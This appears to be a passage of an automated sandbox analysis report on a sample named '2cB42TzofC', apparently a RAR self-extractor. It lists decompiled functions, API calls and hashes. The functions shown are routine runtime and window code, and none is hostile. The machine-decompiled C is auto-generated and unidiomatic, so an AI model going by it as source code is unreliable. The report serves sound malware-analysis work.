                                                        0x00a10e76
                                                        0x00a10e78
                                                        0x00a10e78
                                                        0x00a10e80
                                                        0x00a10e8c
                                                        0x00a10e8c
                                                        0x00a10e9b
                                                        0x00a10ea1
                                                        0x00a10eaa

                                                        APIs
                                                        • __aulldiv.LIBCMT ref: 00A10D6D
                                                          • Part of subcall function 00A0AEE5: GetVersionExW.KERNEL32(?), ref: 00A0AF0A
                                                        • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00A10D90
                                                        • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00A10DA2
                                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00A10DB3
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A10DC3
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A10DD3
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A10E0D
                                                        • __aullrem.LIBCMT ref: 00A10E9B
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                        • String ID:
                                                        • API String ID: 1247370737-0
                                                        • Opcode ID: 59a102b120a8e9905f0f5ac9a28878c3eef4e5e35bcf4ae73555591e1c3b87f5
                                                        • Instruction ID: 2a4b030dbc2181cc34b0207bee7d914a55d9dd8db28535c229099a12c59df8a1
                                                        • Opcode Fuzzy Hash: 59a102b120a8e9905f0f5ac9a28878c3eef4e5e35bcf4ae73555591e1c3b87f5
                                                        • Instruction Fuzzy Hash: 044119B24083059FC714DFA5C8809ABFBF8FB88715F004E2EF59692650E779E589CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A2F0FD Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 73%
                                                        			E00A2F0FD(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0xa3e668; // 0xcba178b4
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0xa61298 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0xa61298 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00A2A237(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0xa61298 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0xa61298 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0xa61298 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E00A28DDF( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E00A28DDF();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									_t48 = _t135 + 8; // 0xff76e900
									 *((intOrPtr*)(_t135 + 4)) =  *_t48 - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E00A1EEFA(_v8 ^ _t136);
			}


































                                                        0x00a2f105
                                                        0x00a2f10c
                                                        0x00a2f10f
                                                        0x00a2f117
                                                        0x00a2f11b
                                                        0x00a2f127
                                                        0x00a2f12a
                                                        0x00a2f12d
                                                        0x00a2f134
                                                        0x00a2f13c
                                                        0x00a2f13f
                                                        0x00a2f145
                                                        0x00a2f14b
                                                        0x00a2f150
                                                        0x00a2f152
                                                        0x00a2f155
                                                        0x00a2f15a
                                                        0x00a2f164
                                                        0x00a2f16b
                                                        0x00a2f16e
                                                        0x00a2f175
                                                        0x00a2f17c
                                                        0x00a2f1a8
                                                        0x00a2f1ce
                                                        0x00a2f1d0
                                                        0x00000000
                                                        0x00a2f1aa
                                                        0x00a2f1ad
                                                        0x00a2f274
                                                        0x00a2f280
                                                        0x00a2f28b
                                                        0x00a2f290
                                                        0x00a2f1b3
                                                        0x00a2f1ba
                                                        0x00a2f1bf
                                                        0x00a2f1c5
                                                        0x00a2f1cb
                                                        0x00000000
                                                        0x00a2f1cb
                                                        0x00a2f1c5
                                                        0x00a2f1ad
                                                        0x00a2f17e
                                                        0x00a2f182
                                                        0x00a2f185
                                                        0x00a2f18b
                                                        0x00a2f18d
                                                        0x00a2f190
                                                        0x00a2f194
                                                        0x00a2f1d1
                                                        0x00a2f1d4
                                                        0x00a2f1d5
                                                        0x00a2f1da
                                                        0x00a2f1e0
                                                        0x00a2f1e6
                                                        0x00a2f1f5
                                                        0x00a2f1fb
                                                        0x00a2f201
                                                        0x00a2f206
                                                        0x00a2f222
                                                        0x00a2f295
                                                        0x00a2f29b
                                                        0x00a2f224
                                                        0x00a2f224
                                                        0x00a2f22c
                                                        0x00a2f235
                                                        0x00a2f23b
                                                        0x00000000
                                                        0x00a2f23d
                                                        0x00a2f23f
                                                        0x00a2f242
                                                        0x00a2f25b
                                                        0x00000000
                                                        0x00a2f25d
                                                        0x00a2f261
                                                        0x00a2f263
                                                        0x00a2f266
                                                        0x00000000
                                                        0x00a2f266
                                                        0x00a2f261
                                                        0x00a2f25b
                                                        0x00a2f23b
                                                        0x00a2f235
                                                        0x00a2f222
                                                        0x00a2f206
                                                        0x00a2f1e0
                                                        0x00000000
                                                        0x00a2f269
                                                        0x00a2f269
                                                        0x00a2f29d
                                                        0x00a2f2af

                                                        APIs
                                                        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00A2F872,00000000,00000000,00000000,00000000,00000000,00A24D0F), ref: 00A2F13F
                                                        • __fassign.LIBCMT ref: 00A2F1BA
                                                        • __fassign.LIBCMT ref: 00A2F1D5
                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00A2F1FB
                                                        • WriteFile.KERNEL32(?,00000000,00000000,00A2F872,00000000,?,?,?,?,?,?,?,?,?,00A2F872,00000000), ref: 00A2F21A
                                                        • WriteFile.KERNEL32(?,00000000,00000001,00A2F872,00000000,?,?,?,?,?,?,?,?,?,00A2F872,00000000), ref: 00A2F253
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                        • String ID:
                                                        • API String ID: 1324828854-0
                                                        • Opcode ID: 3c5d407133319655e195cb1da3a0cbb388e28c4155a6620380f92ba6b3961de6
                                                        • Instruction ID: a5d161aecdbfa1ca1820da821df7d1d1dd1ac72197aa18681a38bb5aaca9a2a5
                                                        • Opcode Fuzzy Hash: 3c5d407133319655e195cb1da3a0cbb388e28c4155a6620380f92ba6b3961de6
                                                        • Instruction Fuzzy Hash: 7D51A375A00259DFDB10CFA8ED45AEEBBF8EF09300F14453AE955E7291D770A941CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A190A2 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 125memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 75%
                                                        			E00A190A2(void* __ecx, void* __edx) {
				void* _t20;
				short* _t24;
				void* _t28;
				signed int _t29;
				intOrPtr _t31;
				intOrPtr* _t38;
				void* _t44;
				void* _t60;
				intOrPtr* _t62;
				short* _t64;
				short* _t66;
				intOrPtr* _t70;
				long _t72;
				void* _t74;
				void* _t75;

				_t60 = __edx;
				_t45 = __ecx;
				_t44 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					return _t20;
				}
				 *(_t74 + 8) =  *(_t74 + 8) & 0x00000000;
				_t62 =  *((intOrPtr*)(_t74 + 0x1c));
				 *((char*)(_t74 + 0x13)) = E00A18F4A(_t62);
				_push(0x200 + E00A23883(_t62) * 2);
				_t24 = E00A238A3(_t45);
				_t66 = _t24;
				if(_t66 == 0) {
					L16:
					return _t24;
				}
				E00A25AD6(_t66, L"<html>");
				E00A27458(_t66, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
				E00A27458(_t66, L"utf-8\"></head>");
				_t75 = _t74 + 0x18;
				_t70 = _t62;
				_t28 = 0x20;
				if( *_t62 != _t28) {
					L4:
					_t29 = E00A11AE6(_t79, _t70, L"<html>", 6);
					asm("sbb al, al");
					_t31 =  ~_t29 + 1;
					 *((intOrPtr*)(_t75 + 0x18)) = _t31;
					if(_t31 != 0) {
						_t62 = _t70 + 0xc;
					}
					E00A27458(_t66, _t62);
					if( *((char*)(_t75 + 0x20)) == 0) {
						E00A27458(_t66, L"</html>");
					}
					_t82 =  *((char*)(_t75 + 0x13));
					if( *((char*)(_t75 + 0x13)) == 0) {
						_push(_t66);
						_t66 = E00A192E5(_t60, _t82);
					}
					_t72 = 9 + E00A23883(_t66) * 6;
					_t64 = GlobalAlloc(0x40, _t72);
					if(_t64 != 0) {
						_t13 = _t64 + 3; // 0x3
						if(WideCharToMultiByte(0xfde9, 0, _t66, 0xffffffff, _t13, _t72 - 3, 0, 0) == 0) {
							 *_t64 = 0;
						} else {
							 *_t64 = 0xbbef;
							 *((char*)(_t64 + 2)) = 0xbf;
						}
					}
					L00A2389E(_t66);
					_t24 =  *0xa6217c(_t64, 1, _t75 + 0x14);
					if(_t24 >= 0) {
						E00A18F81( *((intOrPtr*)(_t44 + 0x10)));
						_t38 =  *((intOrPtr*)(_t75 + 0x10));
						 *0xa33260(_t38,  *((intOrPtr*)(_t75 + 0x10)));
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *_t38 + 8))))();
					}
					goto L16;
				} else {
					goto L3;
				}
				do {
					L3:
					_t70 = _t70 + 2;
					_t79 =  *_t70 - _t28;
				} while ( *_t70 == _t28);
				goto L4;
			}


















                                                        0x00a190a2
                                                        0x00a190a2
                                                        0x00a190a6
                                                        0x00a190ac
                                                        0x00a191f3
                                                        0x00a191f3
                                                        0x00a190b2
                                                        0x00a190b9
                                                        0x00a190c4
                                                        0x00a190d4
                                                        0x00a190d5
                                                        0x00a190da
                                                        0x00a190e0
                                                        0x00a191ed
                                                        0x00000000
                                                        0x00a191ee
                                                        0x00a190ed
                                                        0x00a190f8
                                                        0x00a19103
                                                        0x00a19108
                                                        0x00a1910b
                                                        0x00a1910f
                                                        0x00a19113
                                                        0x00a1911e
                                                        0x00a19126
                                                        0x00a1912d
                                                        0x00a1912f
                                                        0x00a19131
                                                        0x00a19135
                                                        0x00a19137
                                                        0x00a19137
                                                        0x00a1913c
                                                        0x00a19148
                                                        0x00a19150
                                                        0x00a19156
                                                        0x00a19157
                                                        0x00a1915c
                                                        0x00a1915e
                                                        0x00a19166
                                                        0x00a19166
                                                        0x00a19172
                                                        0x00a1917e
                                                        0x00a19182
                                                        0x00a1918c
                                                        0x00a191a1
                                                        0x00a191ae
                                                        0x00a191a3
                                                        0x00a191a3
                                                        0x00a191a8
                                                        0x00a191a8
                                                        0x00a191a1
                                                        0x00a191b2
                                                        0x00a191c0
                                                        0x00a191c9
                                                        0x00a191d4
                                                        0x00a191d9
                                                        0x00a191e5
                                                        0x00a191eb
                                                        0x00a191eb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a19115
                                                        0x00a19115
                                                        0x00a19115
                                                        0x00a19118
                                                        0x00a19118
                                                        0x00000000

                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00A19178
                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00A19199
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AllocByteCharGlobalMultiWide
                                                        • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                        • API String ID: 3286310052-4209811716
                                                        • Opcode ID: 4578270f25bd578d25741c48baf19a001c2883c4ad144a65394ec5c644aaf80a
                                                        • Instruction ID: d3babf37c77b3b9b73411d36c0537075386c5bba6fa9f0ac505f62cb88470a30
                                                        • Opcode Fuzzy Hash: 4578270f25bd578d25741c48baf19a001c2883c4ad144a65394ec5c644aaf80a
                                                        • Instruction Fuzzy Hash: B6316C325083227BD715BB74AC0BFEF7B6CEF52310F040629F901561C1EB649A89C3A5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A19878 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 38%
                                                        			E00A19878(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				struct tagRECT _v16;
				intOrPtr _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				intOrPtr _t33;
				intOrPtr _t34;
				struct HWND__* _t44;
				intOrPtr* _t52;
				void* _t60;
				WCHAR* _t67;
				struct HWND__* _t68;

				_t68 = _a8;
				_t52 = __ecx;
				 *(__ecx + 8) = _t68;
				 *((char*)(__ecx + 0x26)) = _a20;
				ShowWindow(_t68, 0);
				E00A19594(_t52, _a4);
				if( *((intOrPtr*)(_t52 + 0x1c)) != 0) {
					L00A2389E( *((intOrPtr*)(_t52 + 0x1c)));
				}
				if(_a12 != 0) {
					_push(_a12);
					_t33 = E00A273F7(_t52, _t60);
				} else {
					_t33 = 0;
				}
				 *((intOrPtr*)(_t52 + 0x1c)) = _t33;
				if(_a16 != 0) {
					_push(_a16);
					_t34 = E00A273F7(_t52, _t60);
				} else {
					_t34 = 0;
				}
				 *((intOrPtr*)(_t52 + 0x20)) = _t34;
				GetWindowRect(_t68,  &_v16);
				 *0xa6210c(0,  *0xa62158(_t68,  &_v16, 2));
				if( *(_t52 + 4) != 0) {
					 *0xa62114( *(_t52 + 4));
				}
				_t40 = _v36;
				_t20 = _t40 + 1; // 0x1
				_t44 =  *0xa6211c(0, L"RarHtmlClassName", 0, 0x40000000, _t20, _v36, _v28 - _v36 - 2, _v28 - _v36,  *0xa62158(_t68, 0,  *_t52, _t52, _t60));
				 *(_t52 + 4) = _t44;
				if( *((intOrPtr*)(_t52 + 0x10)) != 0) {
					__eflags = _t44;
					if(_t44 != 0) {
						ShowWindow(_t44, 5);
						return  *0xa62110( *(_t52 + 4));
					}
				} else {
					if(_t68 != 0 &&  *((intOrPtr*)(_t52 + 0x20)) == 0) {
						_t78 =  *((intOrPtr*)(_t52 + 0x1c));
						if( *((intOrPtr*)(_t52 + 0x1c)) != 0) {
							_t44 = E00A1968C(_t52, _t78,  *((intOrPtr*)(_t52 + 0x1c)));
							_t67 = _t44;
							if(_t67 != 0) {
								ShowWindow(_t68, 5);
								SetWindowTextW(_t68, _t67);
								return L00A2389E(_t67);
							}
						}
					}
				}
				return _t44;
			}















                                                        0x00a19881
                                                        0x00a19885
                                                        0x00a1988b
                                                        0x00a1988e
                                                        0x00a19891
                                                        0x00a1989d
                                                        0x00a198a6
                                                        0x00a198ab
                                                        0x00a198b0
                                                        0x00a198b6
                                                        0x00a198bc
                                                        0x00a198c0
                                                        0x00a198b8
                                                        0x00a198b8
                                                        0x00a198b8
                                                        0x00a198cb
                                                        0x00a198ce
                                                        0x00a198d4
                                                        0x00a198d8
                                                        0x00a198d0
                                                        0x00a198d0
                                                        0x00a198d0
                                                        0x00a198de
                                                        0x00a198e7
                                                        0x00a198fe
                                                        0x00a19908
                                                        0x00a1990d
                                                        0x00a1990d
                                                        0x00a19913
                                                        0x00a19921
                                                        0x00a1994e
                                                        0x00a19954
                                                        0x00a1995b
                                                        0x00a19995
                                                        0x00a19997
                                                        0x00a1999c
                                                        0x00000000
                                                        0x00a199a5
                                                        0x00a1995d
                                                        0x00a1995f
                                                        0x00a19966
                                                        0x00a19969
                                                        0x00a19970
                                                        0x00a19975
                                                        0x00a19979
                                                        0x00a1997e
                                                        0x00a19986
                                                        0x00000000
                                                        0x00a19992
                                                        0x00a19979
                                                        0x00a19969
                                                        0x00a1995f
                                                        0x00a199b1

                                                        APIs
                                                        • ShowWindow.USER32(?,00000000), ref: 00A19891
                                                        • GetWindowRect.USER32(?,00000000), ref: 00A198E7
                                                        • ShowWindow.USER32(?,00000005,00000000), ref: 00A1997E
                                                        • SetWindowTextW.USER32(?,00000000), ref: 00A19986
                                                        • ShowWindow.USER32(00000000,00000005), ref: 00A1999C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: Window$Show$RectText
                                                        • String ID: RarHtmlClassName
                                                        • API String ID: 3937224194-1658105358
                                                        • Opcode ID: 8a376ab8ec2a22973b0fef3032f0b7ed5b5738a79ef801ba7b754e7f9e6b99f6
                                                        • Instruction ID: 08e4322e984520f7f426bd6b8ec814b857a7174680bcbd63150f47b83d10c4e2
                                                        • Opcode Fuzzy Hash: 8a376ab8ec2a22973b0fef3032f0b7ed5b5738a79ef801ba7b754e7f9e6b99f6
                                                        • Instruction Fuzzy Hash: 4841D532008310EFCB119FA4DD4CB9B7BB8EF4A740F044669FE09591A6CB74D941CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A2C314 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A2C314(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00A2C2D8(_t45, 7);
					E00A2C2D8(_t45 + 0x1c, 7);
					E00A2C2D8(_t45 + 0x38, 0xc);
					E00A2C2D8(_t45 + 0x68, 0xc);
					E00A2C2D8(_t45 + 0x98, 2);
					E00A287FE( *((intOrPtr*)(_t45 + 0xa0)));
					E00A287FE( *((intOrPtr*)(_t45 + 0xa4)));
					E00A287FE( *((intOrPtr*)(_t45 + 0xa8)));
					E00A2C2D8(_t45 + 0xb4, 7);
					E00A2C2D8(_t45 + 0xd0, 7);
					E00A2C2D8(_t45 + 0xec, 0xc);
					E00A2C2D8(_t45 + 0x11c, 0xc);
					E00A2C2D8(_t45 + 0x14c, 2);
					E00A287FE( *((intOrPtr*)(_t45 + 0x154)));
					E00A287FE( *((intOrPtr*)(_t45 + 0x158)));
					E00A287FE( *((intOrPtr*)(_t45 + 0x15c)));
					return E00A287FE( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




                                                        0x00a2c31a
                                                        0x00a2c31f
                                                        0x00a2c328
                                                        0x00a2c333
                                                        0x00a2c33e
                                                        0x00a2c349
                                                        0x00a2c357
                                                        0x00a2c362
                                                        0x00a2c36d
                                                        0x00a2c378
                                                        0x00a2c386
                                                        0x00a2c394
                                                        0x00a2c3a5
                                                        0x00a2c3b3
                                                        0x00a2c3c1
                                                        0x00a2c3cc
                                                        0x00a2c3d7
                                                        0x00a2c3e2
                                                        0x00000000
                                                        0x00a2c3f2
                                                        0x00a2c3f7

                                                        APIs
                                                          • Part of subcall function 00A2C2D8: _free.LIBCMT ref: 00A2C301
                                                        • _free.LIBCMT ref: 00A2C362
                                                          • Part of subcall function 00A287FE: RtlFreeHeap.NTDLL(00000000,00000000,?,00A2C306,?,00000000,?,00000000,?,00A2C32D,?,00000007,?,?,00A2C72A,?), ref: 00A28814
                                                          • Part of subcall function 00A287FE: GetLastError.KERNEL32(?,?,00A2C306,?,00000000,?,00000000,?,00A2C32D,?,00000007,?,?,00A2C72A,?,?), ref: 00A28826
                                                        • _free.LIBCMT ref: 00A2C36D
                                                        • _free.LIBCMT ref: 00A2C378
                                                        • _free.LIBCMT ref: 00A2C3CC
                                                        • _free.LIBCMT ref: 00A2C3D7
                                                        • _free.LIBCMT ref: 00A2C3E2
                                                        • _free.LIBCMT ref: 00A2C3ED
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: b4869a11d69ac16d31ffc0356dc65cdab29eeda7956d265d3493ae357e3f0567
                                                        • Instruction ID: dcc71fd48f6705c36436be05b3ca07128b602f7867b735d0226c45eeac67d1d1
                                                        • Opcode Fuzzy Hash: b4869a11d69ac16d31ffc0356dc65cdab29eeda7956d265d3493ae357e3f0567
                                                        • Instruction Fuzzy Hash: 15116D72581B28FAD520BBB5EE47FCF779DAF10B10F400D35B29DAA052DE28E5054790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A2236A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        C-Code - Quality: 95%
                                                        			E00A2236A(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t26;
				void* _t29;

				if( *0xa3e680 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = E00A235DB(__eflags,  *0xa3e680);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00A23615(__eflags,  *0xa3e680, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t29 = E00A288C9(_t16, 1, 0x28);
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00A23615(__eflags,  *0xa3e680, 0);
								} else {
									__eflags = E00A23615(__eflags,  *0xa3e680, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E00A287FE(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}








                                                        0x00a22371
                                                        0x00a22384
                                                        0x00a2238b
                                                        0x00a2238e
                                                        0x00a22391
                                                        0x00a223aa
                                                        0x00a223aa
                                                        0x00a22393
                                                        0x00a22393
                                                        0x00a22395
                                                        0x00a2239f
                                                        0x00a223a5
                                                        0x00a223a6
                                                        0x00a223a8
                                                        0x00a223b8
                                                        0x00a223bc
                                                        0x00a223be
                                                        0x00a223d2
                                                        0x00a223d2
                                                        0x00a223db
                                                        0x00a223c0
                                                        0x00a223ce
                                                        0x00a223d0
                                                        0x00a223e4
                                                        0x00a223e6
                                                        0x00a223e6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a223d0
                                                        0x00a223e9
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a223a8
                                                        0x00a22395
                                                        0x00a223f1
                                                        0x00a223fb
                                                        0x00a22373
                                                        0x00a22375
                                                        0x00a22375

                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,00A22361,00A1FDB2), ref: 00A22378
                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A22386
                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A2239F
